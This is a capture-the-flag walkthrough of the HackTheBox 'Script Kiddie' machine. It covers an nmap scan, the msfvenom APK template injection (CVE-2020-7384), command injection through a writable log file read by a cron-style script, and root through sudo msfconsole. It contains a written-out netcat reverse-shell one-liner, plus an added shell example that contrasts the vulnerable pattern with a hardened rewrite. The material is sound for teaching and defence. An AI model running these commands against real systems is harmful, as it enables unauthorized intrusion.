Script Kiddie (Easy)

Script Kiddie Hackthebox Walkthrough

Enumeration

Nmap

nmap -sC -sV -oA nmap/ScriptKiddie 10.10.10.226
# Nmap 7.91 scan initiated Wed May 19 10:36:41 2021 as: nmap -sC -sV -oA nmap/ScriptKiddie 10.10.10.226
Nmap scan report for 10.10.10.226
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 19 10:37:45 2021 -- 1 IP address (1 host up) scanned in 64.18 seconds

Besides SSH, port 5000/tcp is open and serving a Werkzeug/Flask app (Python 3.8.5) titled "k1d'5 h4ck3r t00l5". Let's open it in the browser.

The page wraps a few tools, one of them an msfvenom payload generator that accepts an APK "template". After poking around, we find the matching exploit on exploit-db: the Metasploit msfvenom APK template command injection (CVE-2020-7384), where a crafted APK makes msfvenom run a command embedded in it.

After editing the exploit so the injected command spawns a reverse shell to our machine, generating the APK, and uploading it as the template, we get a shell as the web user, kid.

In the home directory of the pwn user we find a script, scanlosers.sh.

The script reads the hackers file (/home/kid/logs/hackers) line by line, takes the third field onward of each line as an IP address, and passes it into a shell command (an nmap scan) without any sanitisation.

And the hackers file is writable by our current user, kid.

The important part is cut -d' ' -f3-: it splits each line on single spaces and keeps everything from the third field to the end of the line, so the first two words are dropped and the rest of the line, including any ; or | characters, reaches the shell command unchanged. Whatever we put after two filler words is executed by pwn.

So we craft a line with two throwaway words followed by a reverse shell one-liner and append it to the hackers file:

echo "a a ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.4 4445 >/tmp/f;" >> hackers

Before writing it, start a netcat listener on port 4445 on the attacking machine (10.10.16.4 here).

When the script processes the file, the listener catches a shell as user pwn.
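To make the injection concrete, here is an added shell example (not the box's scanlosers.sh) that reproduces the pattern the walkthrough describes, cut -d' ' -f3- feeding an unquoted field into sh -c, next to a hardened rewrite that validates the field and passes it as an argument. nmap is replaced by true so it runs offline, and the hackers-style input is constructed in make_payload_log with a harmless touch instead of a reverse shell.

```shell
#!/bin/sh
# Added example, not the script from the box. Reproduces the injectable
# pattern (third field onward of an attacker-writable file pasted into a
# shell string) and a hardened version. nmap is stubbed out with `true`.

# Vulnerable: cut -d' ' -f3- keeps everything after the first two words,
# and that text is interpolated straight into the sh -c string. A line
#   a a ;touch /tmp/x;
# becomes "true ;touch /tmp/x; 2>&1 >/dev/null" and sh runs the touch.
vulnerable_scan() {
    hackers_file="$1"
    cut -d' ' -f3- "$hackers_file" | sort -u | while read -r ip; do
        sh -c "true ${ip} 2>&1 >/dev/null"   # stand-in for the nmap call
    done
}

# Hardened: take exactly the third field, require a dotted quad, and hand
# it to the scanner as an argument, never inside a command string. (The
# file should also not be writable by an untrusted user; that is a
# permissions fix, not a parsing one.) Prints the number of rejected lines.
hardened_scan() {
    hackers_file="$1"
    rejected=0
    while read -r _first _second ip _rest; do
        if printf '%s\n' "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'; then
            true "$ip"      # e.g. nmap --top-ports 10 -oN "recon/$ip.nmap" "$ip"
        else
            rejected=$((rejected + 1))
        fi
    done < "$hackers_file"
    echo "$rejected"
}

# Constructed input in the hackers-file format: two filler words, then a
# payload that creates the marker file given as $1, plus one clean line.
# Prints the path of the temporary log it wrote.
make_payload_log() {
    marker="$1"
    tmplog=$(mktemp)
    printf 'a a ;touch %s;\n' "$marker" > "$tmplog"
    printf 'x y 10.10.10.226\n' >> "$tmplog"
    echo "$tmplog"
}
```

Running vulnerable_scan over the constructed log creates the marker file, which is exactly the primitive the reverse-shell line in the hackers file relies on; hardened_scan rejects that line and only ever sees a validated address.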

Privilege Escalation

sudo -l shows that pwn can run msfconsole as root without a password.

Run sudo msfconsole. msfconsole hands any command it does not recognise to the system shell, so typing /bin/bash at the msf prompt drops us into a root shell.

Voilà, root.
